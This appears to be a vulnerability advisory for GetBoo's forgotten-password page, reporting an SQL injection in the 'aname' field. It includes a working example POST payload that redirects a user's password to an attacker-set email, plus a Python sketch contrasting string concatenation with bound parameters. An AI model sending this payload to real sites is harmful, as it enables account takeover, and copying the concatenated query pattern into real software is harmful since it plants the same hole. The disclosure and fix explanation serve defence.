GetBoo Email Forgotten Password SQL injection
Brought to you by:
chuckatsf
An attacker can leverage a POST to emailpass.php to send users' passwords to an attacker-defined email address. This is done through an SQL injection vulnerability in the 'aname' field.
Example request:

POST /getboo/emailpass.php HTTP/1.1
{snip}
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

aname=') OR name='user' -- &email=attacker@pwn.com&newBtn=New+Password%21
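Added example, not GetBoo's code: a Python/sqlite3 sketch of why the 'aname' value above changes the lookup when it is concatenated into the SQL text, and why binding it as a parameter does not. The table layout, the query shape and the function names are assumptions, since the ticket does not show the source of emailpass.php.

```python
import sqlite3

# 'aname' value from the example request in this ticket, form-decoded.
TICKET_ANAME = "') OR name='user' -- "


def make_db():
    """Constructed stand-in for the user table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("user", "user@example.org"), ("admin", "admin@example.org")],
    )
    return db


def lookup_concatenated(db, aname, email):
    """Assumed vulnerable pattern: request fields pasted into the SQL string.

    The quote and parenthesis in 'aname' close the name comparison early and
    the trailing '--' comments out the email check, so the account is matched
    on the name alone, whatever address was submitted.
    """
    sql = ("SELECT name FROM users WHERE (name = '" + aname +
           "') AND email = '" + email + "'")
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, aname, email):
    """Hardened pattern: both fields are bound parameters, never SQL text.

    Returns the stored (name, email) pairs so the caller mails the address
    on record instead of the address supplied in the request.
    """
    sql = "SELECT name, email FROM users WHERE name = ? AND email = ?"
    return list(db.execute(sql, (aname, email)))


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, TICKET_ANAME, "attacker@pwn.com"))
    print("bound:       ", lookup_bound(db, TICKET_ANAME, "attacker@pwn.com"))
    print("legitimate:  ", lookup_bound(db, "user", "user@example.org"))
```

In a PHP code base the same fix is a prepared statement (PDO or mysqli) with the name and email passed as bound values.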